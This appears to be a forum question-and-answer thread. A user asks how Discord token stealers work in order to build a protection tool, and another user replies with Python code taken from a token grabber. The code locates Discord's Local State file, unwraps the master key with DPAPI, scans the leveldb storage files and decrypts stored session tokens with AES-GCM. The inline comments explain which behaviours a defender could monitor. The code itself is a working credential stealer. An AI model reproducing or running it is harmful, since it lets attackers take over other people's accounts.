I'm writing a program to prevent Discord token theft, and I have a question: how do all these viruses get the Discord token from the Discord application? Which files do they read it from, and how do they decrypt it? I need to understand this in order to write the protection algorithm. I'm doing this in C# with .NET 4.7.2.
I tried searching on Google and GitHub but I didn't find anything.
I have a token grabber, and it accesses:
\AppData\Roaming\discord\Local Storage\leveldb
Hope this helps.
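The code, which is in Python, is below. Note that besides the leveldb directory it also reads \AppData\Roaming\discord\Local State, which holds the DPAPI-protected key used to decrypt the stored value, so a protection tool needs to watch both locations: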
# NOTE(review): the indentation of this listing was lost when it was pasted, so the
# nesting of the loops and the final `if` has to be inferred. The names os, json,
# base64, re, AES, CryptUnprotectData and check_token are not defined in this snippet.
#
# Purpose, as far as the visible lines show: read the desktop client's "Local State"
# file and its leveldb storage under the current user's profile, recover the AES key
# through DPAPI, and decrypt the first stored value that check_token() accepts.
# For a protection tool the observable behaviour is: a process other than the client
# itself reading "Local State" and the *.log / *.ldb files, then calling DPAPI.
def get_token():
# Stored values are located by this literal prefix followed by everything up to
# the next double quote.
encPattern = r'dQw4w9WgXcQ:[^\"]*'
# Both paths are built from %USERPROFILE%, i.e. they are per-user locations that
# any process running as that user can read.
dbPath = os.path.normpath(r"%s\AppData\Roaming\discord\Local Storage\leveldb"%(os.environ['USERPROFILE']))
statePath = os.path.normpath(r"%s\AppData\Roaming\discord\Local State" % (os.environ['USERPROFILE']))
# "Local State" is parsed as JSON; the wrapped key is at os_crypt.encrypted_key.
with open(statePath, 'r') as f:
state = f.read()
state = json.loads(state)
master_key = base64.b64decode(state["os_crypt"]["encrypted_key"])
# The first 5 bytes are dropped before unwrapping - presumably the "DPAPI" marker
# that Chromium-based applications prepend to the blob; confirm against a sample.
master_key = master_key[5:]
# DPAPI unwraps the key for the logged-on user. No extra entropy or prompt is
# supplied, so the only protection on the key is the user's own session: code
# running as the same user can make this call. Element [1] of the result is kept.
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
# Only files whose names end in "log" or "ldb" are inspected.
for file_name in os.listdir(dbPath):
if file_name[-3:] not in ["log", "ldb"]:
continue
# The file is opened in text mode with decoding errors ignored and is never
# explicitly closed; blank lines are skipped.
for line in [x.strip() for x in open(f'{dbPath}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in re.findall(encPattern, line):
# Strip the literal prefix and base64-decode the remainder.
enc_token = base64.b64decode(y.split('dQw4w9WgXcQ:')[1])
# Bytes 3..14 are used as the 12-byte nonce; the first 3 bytes are skipped
# (presumably a version tag - TODO confirm). The rest is ciphertext plus
# trailing bytes.
iv = enc_token[3:15]
payload = enc_token[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
# decrypt() is called without tag verification; the last 16 bytes (the
# length of a GCM tag) are simply cut off before decoding to text.
decr_token = cipher.decrypt(payload)
decr_token = decr_token[:-16].decode()
# check_token() is defined elsewhere; the first value it accepts is
# returned. No explicit return is visible for the case where none passes.
if check_token(decr_token):
return decr_token